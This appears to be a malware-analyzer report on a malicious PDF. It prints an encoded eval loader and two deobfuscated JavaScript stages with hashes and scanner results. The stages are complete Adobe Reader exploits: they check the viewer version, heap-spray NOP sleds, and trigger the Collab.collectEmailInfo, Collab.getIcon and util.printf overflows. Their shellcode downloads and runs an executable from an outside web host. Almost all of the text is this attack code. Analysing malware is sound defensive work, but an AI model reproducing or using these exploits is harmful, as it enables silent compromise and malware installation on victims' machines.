1OSU3MCU3OCU2NCU1YSUyMCUyZCUyMCUyOCU2OCU1NyU0ZCU2NCU0YyU0ZiU0NyU2NSUzNCUyMCUyYiUyMCUzMCU3OCUzMyUzOCUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzOSUzMCUzOSUzMCUyNSU3NSUzOSUzMCUzOSUzMCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyMCUzZCUyMCU0OCU1MyU0NyU2ZiU1OCU2NSU0YSU0MyU1YSUyOCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyYyUyMCU2YSU2YSU3NyUzMiU2OSU0MyU0NCU0ZiU0ZSUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2YSU3NSU2OSU2OSU0ZCU2MyU0MyU0MyU0MyUyMCUzZCUyMCUyOCU1OCUzMiU2NCU0YSU2NSU0ZCU0NiU2NiUzNiUyMCUyZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUyOSUyMCUyZiUyMCU1OSUzMyU0NSU2NCU1OSU3MCU3OCU2NCU1YSUzYiUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU3NiU2MSU3MiUyMCU2YiUzMCU0ZSU2NCU2NyU1MSU3MyU0YiU3OSUyMCUzZCUyMCUzMCUzYiUyMCU2YiUzMCU0ZSU2NCU2NyU1MSU3MyU0YiU3OSUyMCUzYyUyMCU2YSU3NSU2OSU2OSU0ZCU2MyU0MyU0MyU0MyUzYiUyMCU2YiUzMCU0ZSU2NCU2NyU1MSU3MyU0YiU3OSUyYiUyYiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3OSUzNyU0MiU2ZSU2MSU0ZiU0NyU1MiU0ZiU1YiU2YiUzMCU0ZSU2NCU2NyU1MSU3MyU0YiU3OSU1ZCUyMCUzZCUyMCU2NyU0MiU2ZiUzNCU2NSU3NSU0NSU1MyU1NSUyMCUyYiUyMCU2MiU3NCU1NCU3MCU1YSU1NSU3OCU0MiU3OCUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU0MiU0OSU2MyU0OCU2YyUzMCU2NCU1MCU1NSUyOCUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1NiU2NyUzMCUzNiU0YSUzNCU2ZSUzMyU1MCUyMCUzZCUyMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzZCUyMCU2MSU3MCU3MCUyZSU3NiU2OSU2NSU3NyU2NSU3MiU1NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyZSU3NCU2ZiU1MyU3NCU3MiU2OSU2ZSU2NyUyOCUyOSUzYiUyMCUyMCUyMCUyMCU2MSU3MCU3MCUyZSU2MyU2YyU2NSU2MSU3MiU1NCU2OSU2ZCU2NSU0ZiU3NSU3NCUyOCU1OSU0NyU0MyU2NyU0MSU1MyU2MiU2YiU3NSUyOSUzYiUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzZSUzZCUyMCUzOCUyMCUyNiUyNiUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzMiUyOSUyMCU3YyU3YyUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzYyUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU2MSUzMSUzOCU2MiU1NCU1YSU3MiU0OCUzNyUyOCUzMCUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0OSU1MiU2YyU1MCUzMCUzNCUzMiU1MSU3MCUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzMCU2MyUzMCU2MyUyNSU3NSUzMCU2MyUzMCU2MyUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU0OSU1MiU2YyU1MCUzMCUzNCUzMiU1MSU3MCUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzNCUzNCUzOSUzNSUzMiUyOSUyMCU0OSU1MiU2YyU1MCUzMCUzNCUzMiU1MSU3MCUyMCUyYiUzZCUyMCU0OSU1MiU2YyU1MCUzMCUzNCUzMiU1MSU3MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3MyUzNSU0NSU2NiUzNyU3NiU2ZiU0MiU0NSUyMCUzZCUyMCU3NCU2OCU2OSU3MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2OCU3YSU0OCU0OCU1MCU1NyU3MyUzMiU1MiUyMCUzZCUyMCU0MyU2ZiU2YyU2YyU2MSU2MiUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3MyUzNSU0NSU2NiUzNyU3NiU2ZiU0MiU0NSU1YiUyMiU2MyU2ZiU2YyU2YyU2MSU2MiU1MyU3NCU2ZiU3MiU2NSUyMiU1ZCUyMCUzZCUyMCU2OCU3YSU0OCU0OCU1MCU1NyU3MyUzMiU1MiU1YiUyMiU2MyU2ZiU2YyU2YyU2NSU2MyU3NCU0NSU2ZCU2MSU2OSU2YyU0OSU2ZSU2NiU2ZiUyMiU1ZCUyOCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3MyU3NSU2MiU2YSUyMCUzYSUyMCUyMiUyMiUyYyUyMCU2ZCU3MyU2NyUyMCUzYSUyMCU0OSU1MiU2YyU1MCUzMCUzNCUzMiU1MSU3MCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2OSU2NiUyOCUyOCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzZSUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCUyNiUyNiUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzYyUyMCUzOCUyZSUzMSUzMCUzNCUyOSUyMCU3YyU3YyUyMCUyOCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzZSUzZCUyMCUzOSUyMCUyNiUyNiUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzYyUyMCUzOSUyZSUzMSUyOSUyMCU3YyU3YyUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzYyUzZCUyMCUzNyUyZSUzMSUzMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NCU3MiU3OSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU2MSU3MCU3MCUyZSU2NCU2ZiU2MyUyZSU0MyU2ZiU2YyU2YyU2MSU2MiUyZSU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2MSUzMSUzOCU2MiU1NCU1YSU3MiU0OCUzNyUyOCUzMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSUzMCUzOSUyMiUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUzYyUyMCUzMCU3OCUzNCUzMCUzMCUzMCUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUyMCUyYiUzZCUyMCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUyMCUzZCUyMCUyMiU0ZSUyZSUyMiUyMCUyYiUyMCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NSU3NCUzMiU2YSUzNCUzNiU3OSU2OSU0MiUyMCUzZCUyMCU2MSU3MCU3MCUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NSU3NCUzMiU2YSUzNCUzNiU3OSU2OSU0MiU1YiUyMiU2NCU2ZiU2MyUyMiU1ZCU1YiUyMiU0MyU2ZiU2YyU2YyU2MSU2MiUyMiU1ZCU1YiUyMiU2NyU2NSU3NCU0OSU2MyU2ZiU2ZSUyMiU1ZCUyOCU3NiUzMyUzMSUzNiU1MyU1MiU3MSU3MiU2MSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NiU2NyUzMCUzNiU0YSUzNCU2ZSUzMyU1MCUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NiU2NyUzMCUzNiU0YSUzNCU2ZSUzMyU1MCUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2MyU2MSU3NCU2MyU2OCUyOCU2NSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU1NiU2NyUzMCUzNiU0YSUzNCU2ZSUzMyU1MCUyMCUzZCUyMCUzMSUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU1NiU2NyUzMCUzNiU0YSUzNCU2ZSUzMyU1MCUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2OSU2NiUyOCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzZCUzZCUyMCUzOCUyZSUzMSUzMCUzMiUyMCU3YyU3YyUyMCU1NyU0NSU2MiU2MyU3NiU2YyUzMSU1OSU1MiUyMCUzZCUzZCUyMCUzNyUyZSUzMSUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2MSUzMSUzOCU2MiU1NCU1YSU3MiU0OCUzNyUyOCUzMSUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NyU1NyU0ZSUzOSU0ZiU0ZCU1MCU2NiU2ZCUyMCUzZCUyMCUyMiUzMSUzMiUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUzOSUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2NiU2ZiU3MiUyOCU3MiU1OSU2ZiU0ZSU0MyU3MSU0ZSU0OCU0OSUyMCUzZCUyMCUzMCUzYiUyMCU3MiU1OSU2ZiU0ZSU0MyU3MSU0ZSU0OCU0OSUyMCUzYyUyMCUzMiUzNyUzNiUzYiUyMCU3MiU1OSU2ZiU0ZSU0MyU3MSU0ZSU0OCU0OSUyYiUyYiUyOSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NyU1NyU0ZSUzOSU0ZiU0ZCU1MCU2NiU2ZCUyMCUyYiUzZCUyMCUyMiUzOCUyMiUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2MiUzOSU0MSU1MSUzMyUzNCU1MiU2ZCUzOCUyMCUzZCUyMCU3NSU3NCU2OSU2YyUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU2MiUzOSU0MSU1MSUzMyUzNCU1MiU2ZCUzOCU1YiUyMiU3MCU3MiU2OSU2ZSU3NCU2NiUyMiU1ZCUyOCUyMiUyNSUzNCUzNSUzMCUzMCUzMCU2NiUyMiUyYyUyMCU3NyU1NyU0ZSUzOSU0ZiU0ZCU1MCU2NiU2ZCUyOSUzYiUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3ZCUyMCU3ZCUyMCIpKTsgCiBhcHAuWWxxamZON25sID0gQkljSGwwZFBVOwogWUdDZ0FTYmt1ID0gYXBwLnNldFRpbWVPdXQoImFwcC5ZbHFqZk43bmwoKSIsIDEpOwo="); var sssddd = eval; sssddd(aasd);
`generic_stage_recovery_000.js`	deobfuscated-js	generic stage recovery percent-decode from JavaScript object 9 at offset 0xD6	5152 bytes
SHA-256: `400becb74a47467995760b1dc02e9df7dee8f642f008970278dbe07c0ee258f5`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var y7BnaOGRO = new Array(); var YGCgASbku; var lave = eval; lave(unescape(" function HSGoXeJCZ(gBo4euESU, jjw2iCDON) { while(gBo4euESU.length * 2 < jjw2iCDON) { gBo4euESU += gBo4euESU; } gBo4euESU = gBo4euESU.substring(0, jjw2iCDON / 2); return gBo4euESU; } ")); lave(unescape(" function a18bTZrH7(qaJ5jVtnA) { if(qaJ5jVtnA == 0) { var X2dJeMFf6 = 0x0c0c0c0c; var btTpZUxBx = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u7777%u682E%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(qaJ5jVtnA == 1) { X2dJeMFf6 = 0x30303030; var btTpZUxBx = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u7777%u682E%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(qaJ5jVtnA == 2) { var btTpZUxBx = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u7777%u682E%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var Y3EdYpxdZ = 0x400000; var hWMdLOGe4 = btTpZUxBx.length * 2; var jjw2iCDON = Y3EdYpxdZ - (hWMdLOGe4 + 0x38); var gBo4euESU = unescape("%u9090%u9090"); gBo4euESU = HSGoXeJCZ(gBo4euESU, jjw2iCDON); var juiiMcCCC = (X2dJeMFf6 - 0x400000) / Y3EdYpxdZ; for(var k0NdgQsKy = 0; k0NdgQsKy < juiiMcCCC; k0NdgQsKy++) { y7BnaOGRO[k0NdgQsKy] = gBo4euESU + btTpZUxBx; } } ")); lave(unescape(" function BIcHl0dPU() { var Vg06J4n3P = 0; var WEbcvl1YR = app.viewerVersion.toString(); app.clearTimeOut(YGCgASbku); if((WEbcvl1YR >= 8 && WEbcvl1YR < 8.102) \|\| WEbcvl1YR < 7.1) { a18bTZrH7(0); var IRlP042Qp = unescape("%u0c0c%u0c0c"); while(IRlP042Qp.length < 44952) IRlP042Qp += IRlP042Qp; var s5Ef7voBE = this; var hzHHPWs2R = Collab; s5Ef7voBE["collabStore"] = hzHHPWs2R["collectEmailInfo"]( { subj : "", msg : IRlP042Qp } ); } if((WEbcvl1YR >= 8.102 && WEbcvl1YR < 8.104) \|\| (WEbcvl1YR >= 9 && WEbcvl1YR < 9.1) \|\| WEbcvl1YR <= 7.101) { try { if(app.doc.Collab.getIcon) { a18bTZrH7(2); var v316SRqra = unescape("%09"); while(v316SRqra.length < 0x4000) { v316SRqra += v316SRqra; } v316SRqra = "N." + v316SRqra; var ut2j46yiB = app; ut2j46yiB["doc"]["Collab"]["getIcon"](v316SRqra); Vg06J4n3P = 1; } else { Vg06J4n3P = 1; } } catch(e) { Vg06J4n3P = 1; } if(Vg06J4n3P == 1) { if(WEbcvl1YR == 8.102 \|\| WEbcvl1YR == 7.1) { a18bTZrH7(1); var wWN9OMPfm = "12999999999999999999"; for(rYoNCqNHI = 0; rYoNCqNHI < 276; rYoNCqNHI++) { wWN9OMPfm += "8"; } var b9AQ34Rm8 = util; b9AQ34Rm8["printf"]("%45000f", wWN9OMPfm); } } } } ")); app.YlqjfN7nl = BIcHl0dPU; YGCgASbku = app.setTimeOut("app.YlqjfN7nl()", 1);
`generic_stage_recovery_001.js`	deobfuscated-js	generic stage recovery percent-decode -> percent-decode from JavaScript object 9 at offset 0xD6	5148 bytes
SHA-256: `c0811293649b017da2b5df50484e4bfa4ba940a399dc97c94213ac914c5753c4`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 10 eval/decoder/string-building token(s).
Preview script First 1,000 lines of the extracted script var y7BnaOGRO = new Array(); var YGCgASbku; var lave = eval; lave(unescape(" function HSGoXeJCZ(gBo4euESU, jjw2iCDON) { while(gBo4euESU.length * 2 < jjw2iCDON) { gBo4euESU += gBo4euESU; } gBo4euESU = gBo4euESU.substring(0, jjw2iCDON / 2); return gBo4euESU; } ")); lave(unescape(" function a18bTZrH7(qaJ5jVtnA) { if(qaJ5jVtnA == 0) { var X2dJeMFf6 = 0x0c0c0c0c; var btTpZUxBx = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u7777%u682E%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(qaJ5jVtnA == 1) { X2dJeMFf6 = 0x30303030; var btTpZUxBx = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u7777%u682E%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } else if(qaJ5jVtnA == 2) { var btTpZUxBx = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u7777%u682E%u7265%u736F%u6D69%u3161%u6579%u3074%u6730%u632E%u2F6E%u796D%u7865%u2F70%u6567%u6574%u6578%u702E%u7068%u733F%u6C70%u703D%u6664%u655F%u7078"); } var Y3EdYpxdZ = 0x400000; var hWMdLOGe4 = btTpZUxBx.length * 2; var jjw2iCDON = Y3EdYpxdZ - (hWMdLOGe4 + 0x38); var gBo4euESU = unescape("%u9090%u9090"); gBo4euESU = HSGoXeJCZ(gBo4euESU, jjw2iCDON); var juiiMcCCC = (X2dJeMFf6 - 0x400000) / Y3EdYpxdZ; for(var k0NdgQsKy = 0; k0NdgQsKy < juiiMcCCC; k0NdgQsKy++) { y7BnaOGRO[k0NdgQsKy] = gBo4euESU + btTpZUxBx; } } ")); lave(unescape(" function BIcHl0dPU() { var Vg06J4n3P = 0; var WEbcvl1YR = app.viewerVersion.toString(); app.clearTimeOut(YGCgASbku); if((WEbcvl1YR >= 8 && WEbcvl1YR < 8.102) \|\| WEbcvl1YR < 7.1) { a18bTZrH7(0); var IRlP042Qp = unescape("%u0c0c%u0c0c"); while(IRlP042Qp.length < 44952) IRlP042Qp += IRlP042Qp; var s5Ef7voBE = this; var hzHHPWs2R = Collab; s5Ef7voBE["collabStore"] = hzHHPWs2R["collectEmailInfo"]( { subj : "", msg : IRlP042Qp } ); } if((WEbcvl1YR >= 8.102 && WEbcvl1YR < 8.104) \|\| (WEbcvl1YR >= 9 && WEbcvl1YR < 9.1) \|\| WEbcvl1YR <= 7.101) { try { if(app.doc.Collab.getIcon) { a18bTZrH7(2); var v316SRqra = unescape(" "); while(v316SRqra.length < 0x4000) { v316SRqra += v316SRqra; } v316SRqra = "N." + v316SRqra; var ut2j46yiB = app; ut2j46yiB["doc"]["Collab"]["getIcon"](v316SRqra); Vg06J4n3P = 1; } else { Vg06J4n3P = 1; } } catch(e) { Vg06J4n3P = 1; } if(Vg06J4n3P == 1) { if(WEbcvl1YR == 8.102 \|\| WEbcvl1YR == 7.1) { a18bTZrH7(1); var wWN9OMPfm = "12999999999999999999"; for(rYoNCqNHI = 0; rYoNCqNHI < 276; rYoNCqNHI++) { wWN9OMPfm += "8"; } var b9AQ34Rm8 = util; b9AQ34Rm8["printf"]("E000f", wWN9OMPfm); } } } } ")); app.YlqjfN7nl = BIcHl0dPU; YGCgASbku = app.setTimeOut("app.YlqjfN7nl()", 1);

Open this report in the interactive analyzer, or submit your own file for analysis.